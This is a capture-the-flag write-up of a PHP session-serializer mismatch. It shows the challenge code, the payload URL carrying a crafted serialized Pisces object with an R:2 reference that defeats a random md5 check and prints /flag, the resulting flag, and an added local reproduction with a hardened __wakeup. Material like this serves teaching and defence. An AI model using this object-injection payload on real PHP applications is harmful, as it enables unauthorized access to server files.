Source

```php
<?php
error_reporting(0);
session_start();

class Pisces {
    public $romance;
    public $fantasy;

    function __wakeup() {
        printf("%s\n", __METHOD__);
        $this->fantasy = md5(rand(1, 10000));
        if ($this->romance === $this->fantasy) {
            echo file_get_contents('/flag');
        }
    }
}
```
View hint

```php
<?php
error_reporting(0);
ini_set('session.serialize_handler', 'php_serialize');
session_start();

if (isset($_REQUEST['Pisces'])) {
    $_SESSION['Pisces'] = $_REQUEST['Pisces'];
} else {
    echo "系统检测发现该处漏洞,进行攻击测试\n";
}
?>
```
POC
```php
<?php
class Pisces {
    public $romance;
    public $fantasy;
}

$pisces = new Pisces();
// Make romance an alias of fantasy so serialize() emits an R: back-reference
// instead of two independent values
$pisces->romance = &$pisces->fantasy;
echo serialize($pisces);
```
/post/session.php?Pisces=|O:6:"Pisces":2:{s:7:"romance";N;s:7:"fantasy";R:2;}
After sending the parameter to session.php, return to the index page. The index page uses the default `php` session serializer, which treats `|` as the separator between a key and its serialized value, so the data after `|` is unserialized as a `Pisces` object and `__wakeup` is triggered.
Result
Pisces::__wakeup Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}
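The following is an added example, not part of the original write-up or the challenge code: it reproduces the serializer mismatch and the `R:2` reference trick locally (no `/flag`, no real session), and shows a hardened `__wakeup` that copies the submitted value before the secret is generated. The class names `PiscesVulnerable`/`PiscesHardened`, the `$won` flag and the helper functions are constructed for this example.

```php
<?php
// 1. Serializer mismatch: the hint page stores with 'php_serialize', the
//    index page reads with the default 'php' handler, which splits the blob
//    at the first '|' into key|serialized-value. Simulated here for one entry.
function phpHandlerSplit(string $blob): array {
    $pos = strpos($blob, '|');
    return [substr($blob, 0, $pos), substr($blob, $pos + 1)];
}
$stored = serialize(['Pisces' => '|O:6:"Pisces":2:{s:7:"romance";N;s:7:"fantasy";R:2;}']);
[$key, $value] = phpHandlerSplit($stored);
// $value now starts at O:6:"Pisces"..., so the 'php' handler unserializes an object
// rather than the string the hint page thought it stored.

// 2. Reference trick: R:2 makes fantasy an alias of romance (slot 2), so the
//    md5 written into fantasy is also the value read back from romance.
class PiscesVulnerable {
    public $romance; public $fantasy; public $won = false;
    function __wakeup() {
        $this->fantasy = md5(rand(1, 10000));
        if ($this->romance === $this->fantasy) { $this->won = true; }  // passes
    }
}

// Hardened: copy the submitted value before the secret is generated. The copy
// is an independent string, so a reference inside the payload cannot change
// what is compared after fantasy is overwritten.
class PiscesHardened {
    public $romance; public $fantasy; public $won = false;
    function __wakeup() {
        $submitted = (string) $this->romance;
        $this->fantasy = md5(rand(1, 10000));
        if ($submitted === $this->fantasy) { $this->won = true; }  // no longer passes
    }
}

// Same payload shape as the POC output above, with the class name swapped in.
function payloadFor(string $class): string {
    return sprintf('O:%d:"%s":2:{s:7:"romance";N;s:7:"fantasy";R:2;}', strlen($class), $class);
}
var_dump(unserialize(payloadFor('PiscesVulnerable'))->won);
var_dump(unserialize(payloadFor('PiscesHardened'))->won);
```

Keeping `session.serialize_handler` identical on every page that reads or writes the session removes the first ingredient entirely; the copy in `__wakeup` only neutralises the reference trick.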
References:
https://www.yuque.com/shiyizhesonder/sonder39/nfvx411pp209arek
https://www.yuque.com/shiyizhesonder/sonder39/awxqal5aynlm14p2